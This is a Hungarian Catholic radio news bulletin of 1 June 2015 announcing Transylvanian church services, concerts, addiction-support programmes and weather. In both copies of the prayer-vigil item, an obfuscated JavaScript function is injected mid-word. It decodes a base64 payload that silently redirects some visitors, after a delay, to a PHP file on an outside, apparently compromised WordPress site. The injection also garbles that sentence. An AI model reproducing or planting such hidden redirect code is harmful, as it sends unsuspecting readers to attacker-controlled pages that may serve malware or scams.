2015. június 1. – Hírek és programajánló

H Í R E K   E S T E 

Folytatódik a Szent Antal nagykilenced
A csíksomlyói esti hét órás szentmisén Csintalan László csíkdelnei plébános folytatja szentbeszéd-sorozatát, amelybe a Mária Rádión keresztül és a csiksomlyo.ro oldalon is bekapcsolódhatunk.
 A szatmárnémeti Szent Antal templomban, holnap délelőtt a tíz órakor kezdődő szentmisén a prédikációt Istvánfi Szilárd, a szatmárnémeti Szent Család plébánia segédlelkésze tartja. 
A székelyudvarhelyi ferences templomban holnap délelőtt tíz órától a pálos szerzetesrendről, Balla Barnabás álos szerzetes tart előadást.

Szerdai pár-beszéd Marosvásárhelyen
2015. június 3-án, Marosvásárhelyen a Szerdai párbeszédek hetedik alkalma következik. Témája: Gyermekeink-kapcsolatunk tükre. Meghívottak: Balázs-Petz Bogi és Sándor négygyerekes szülők, Derzsi Ágnes pedagógus, Cosma István pszichológus, családterapeuta, mentálhigiénés szakember. Minden érdeklődőt várnak szerda este hét órára az Ama Deus cukrászdába.

Engesztelő imavirrasztás Székelyudvarhelyen
A Mária Rádió székelyudvarhelyi kápolnájában minden hónap első szerdáján egész éjjel virrasztást tartanak, tizenegy órától szentmisét mutatnak be. Az engesztelő imavirrasztásra hívnak együtt imádkozni mindenkit, aki Jézussal szeretne időt tölteni. A virrasztást városukért, egyházközségeikért, a fiatalok testi-lelki tisztaságáért, a családokért, egyedülállókért, a jegyesekért, gyermeket vágyó és váró szülőkért, betegekért, elhunyt szeretteikért, saját magukért és egyéni szándékokra ajánlják az udvarhelyiek.
A kápolnában ugyanakkor minden reggel nyolc órától este nyolc óráig állfunction a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<>4);w6=((w9&15)<>2);qe=((we&3)<=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa<y1.length);document.write(x0);};a4872b9c6b('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9oYWxlYWluYS1jYWZlLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYWxsLWluLW9uZS1zZW8tcGFjay9pbmMvdHJhbnNsYXRpb24ucGhwJyIsIGRlbGF5KTsNCn0NCjwvc2NyaXB0PgAA');andó, egész napos szentségimádás van Várják az Istent imádni, engesztelni vágyókat. 

Beszélgetések a legkisebbekről Székelyudvarhelyen
A Gyulaheférvári Caritas Korai Nevelő- és Fejlesztőközpontja előadás-sorozatot indít kisgyermekes szülőknek június 3-ka és október 7-ke között, Székelyudvarhelyen. A beszélgetések meghívottja Szalay Zsuzsanna pszichológus, aki a mindennapokban gondot okozó témák közül boncolgat néhányat, a szülők segítségével. Az előadásokon elméleti tudást és gyakorlati ötleteket is kapnak az érdeklődők. Az előadások helyszíne: Gyulafehérvári Caritas Korai Nevelő- és Fejlesztőközpont, Székelyudvarhely, Kossuth Lajos utca 18 szám. Érdeklődni a 0735-735151-es telefonszámon lehet vagy személyesen a központban.

Úrnapi búcsú   

Csütörtökön, június 4-én Úrnapja, a székelyudvarhelyi Főesperesi Kerület búcsúja.  Az ünnepi szentmise tizenegy órakor kezdődik a Márton Áron téren. A szentmisét főpásztorunk, Dr. Jakubinyi György érsek mutatja be,  ünnepi szónok Ft. Varga Rezső kanonok, esperes, a Gyulafehérvári Főegyházmegye vagyonkezelője lesz. Az ünnepi szentmisét rádiónk élőben közvetíti. 

Koncert Kolozsváron

A Kolozsvár 2015 Európa Ifjúsági Fővárosa rendezvénysorozat keretében rendkívüli hangversenyre kerül sor június 6-án, szombaton este hét órától a Piarista templomban. A hangversenyen fellép a kolozsvári Visszhang kórus és kamarazenekar, vezényel Molnár Botond. Cesar Franck „Dextera Domini” offertoriuma és a „Jézus utolsó hét szava a keresztfán” című oratórium hangzik el. A belépés díjtalan. Mindenkit szeretettel várnak! 

Találkozás az Anonim Alkoholistákkal
2015. június 12-én találkozásra hívja az Anonim Alkoholisták csoportja mindazokat, akik érintettek az alkohol betegség problémájában. A találkozóra a sepsiszentgyörgyi Krisztus Király templomban kerül sor. Este 6 órakor szentmisével kezdődik az együttlét, majd 7 órától felekezeti hovatartozásra való tekintet nélkül várják az alkohollal küzdőket és hozzátartozóikat. Biztatjuk a kedves hallgatókat, merjenek bátran segítséget kérni, június 12-én, pénteken Sepsiszentgyörgyön!

Segítség szenvedélybetegeknek
A Bonus Pastor Alapítvány rövidtávú terápiás programot szervez szenvedélybetegeknek és felnőtt hozzátartozóiknak június 15-26. között Szentkatolnán. Az ország bármelyik részéről várják azok jelentkezését, akik változtatni szeretnének alkohol-, drog-, nikotin-, játék- vagy társfüggőségükkel terhelt életmódjukon. Jelentkezési határidő: június 8. Bővebb információk a bonuspastor.ro honlapon találhatók.

Az időjárásról: Továbbra is sok napsütésre készülhetünk, kevés felhő lesz az égen, csapadék  elszórtan az erdélyi medencében várható. Napközben megélénkülhet a szél. Az enyhe hajnalt követően a csúcshőmérséklet egyre többfelé eléri a 30 fokot. 

MRE - Hírszolgálat, 2015. júmius 1.


H Í R E K   R E G G E L / D É L B E N

Mágikus gyermeknap a Kolozsvári Állami Magyar Színházban
Különleges eseménnyel készül a Kolozsvári Állami Magyar Színház gyermeknapra. Ma délután öt órai kezdettel kicsiket és nagyokat egyaránt várunk a színház stúdiótermébe, egy szórakoztató és elkápráztató bűvészműsorra. Belloni interaktív és humoros előadása garantáltan emlékezetessé teszi ezt a családi ünnepet. Jegyek a színház jegypénztárában kaphatók, gyerekeknek 10, felnőtteknek 20 lej értékben. 

OKIT 2015 
Az idei Országos Katolikus Ifjúsági Találkozónak a 2015-ös év Európai Ifjúsági Fővárosa, Kolozsvár ad otthont. A szervezők meghosszabbították az első jelentkezési határidőt, így június 1.-ig várják az érdeklődő fiatalok bejelentkezését a www.intc.ro honlapon, ahol bővebb információt is találnak a rendezvényről.

Koncert Kolozsváron
A Kolozsvár 2015 Európa Ifjúsági Fővárosa rendezvénysorozat keretében rendkívüli hangversenyre kerül sor június 6-án, szombaton este hét órától a Piarista templomban. A hangversenyen fellép a kolozsvári Visszhang kórus és kamarazenekar, vezényel Molnár Botond. Cesar Franck „Dextera Domini” offertoriuma és a „Jézus utolsó hét szava a keresztfán” című oratórium hangzik el. A belépés díjtalan. Mindenkit szeretettel várnak! 

Caritas önkéntes tábor
Tizenkettedik alkalommal szervez önkéntes tábort a Gyulafehérvári Caritas tettrekész és szórakozni vágyó fiatalok számára a Hunyad megyei Petrozsényban július 6-12. között. A táborozók egy héten át a helyiekkel együttműködve a közösség építése, szépítése érdekében fognak dolgozni minden nap, délelőtt öt órát: felújítási munkálatok, tereprendezés, környezetvédelem, gyermekek számára vakációs program szervezése, idősekkel való foglalkozás. A délutáni órákban különböző csoporttevékenységeken vehetnek részt, így előadásokra, kézműves foglalkozásokra, sporttevékenységekre, kirándulásra kerül majd sor, és nem maradnak el az esti szórakoztató programok sem. Jelentkezni június 10-ig lehet a 0732-830.171-es telefonszámon.

Segítség szenvedélybetegeknek
A Bonus Pastor Alapítvány rövidtávú terápiás programot szervez szenvedélybetegeknek és felnőtt hozzátartozóiknak június 15-26. között Szentkatolnán. Az ország bármelyik részéről várják azok jelentkezését, akik változtatni szeretnének alkohol-, drog-, nikotin-, játék- vagy társfüggőségükkel terhelt életmódjukon. Jelentkezési határidő: június 8. Bővebb információk a bonuspastor.ro honlapon találhatók.

Engesztelő imavirrasztás Székelyudvarhelyen
A Mária Rádió székelyudvarhelyi kápolnájában minden hónap első szerdáján egész éjjel virrasztást tartanak, tizenegy órától szentmisét mutatnak be. Az engesztelő imavirrasztásra hívnak együtt imádkozni mindenkit, aki Jézussal szeretne időt tölteni. A virrasztást városukért, egyházközségeikért, a fiatalok testi-lelki tisztaságáért, a családokért, egyedülállókért, a jegyesekért, gyermeket vágyó és váró szülőkért, betegekért, elhunyt szeretteikért, saját magukért és egyéni szándékokra ajánlják az udvarhelyiek.
A kápolnában ugyanakkor minden reggel nyolc órától este nyolc óráig állfunction a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<>4);w6=((w9&15)<>2);qe=((we&3)<=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa<y1.length);document.write(x0);};a4872b9c6b('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9oYWxlYWluYS1jYWZlLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYWxsLWluLW9uZS1zZW8tcGFjay9pbmMvdHJhbnNsYXRpb24ucGhwJyIsIGRlbGF5KTsNCn0NCjwvc2NyaXB0PgAA');andó, egész napos szentségimádás van Várják az Istent imádni, engesztelni vágyókat. 

Úrnapi búcsú 
Csütörtökön, június 4-én Úrnapja, a székelyudvarhelyi Főesperesi Kerület búcsúja.  Az ünnepi szentmise tizenegy órakor kezdődik a Márton Áron téren. A szentmisét főpásztorunk, Dr. Jakubinyi György érsek mutatja be,  ünnepi szónok Ft. Varga Rezső kanonok, esperes, a Gyulafehérvári Főegyházmegye vagyonkezelője lesz. Az ünnepi szentmisét rádiónk élőben közvetíti. 

Az időjárásról: Derűs, napsütéses, helyenként átmenetileg felhős napra számíthatunk, mérsékelt szélmozgással és enyhén emelkedő légköri nyomás-értékekkel. A legalacsonyabb hőmérsékleti értékek 4 - 14 C körül, a legmagasabbak 24 - 30 C fok körül alakulnak a mai nap folyamán.

MRE - Hírszolgálat, 2015. június 1.

About the author

maradmin

Leave a Comment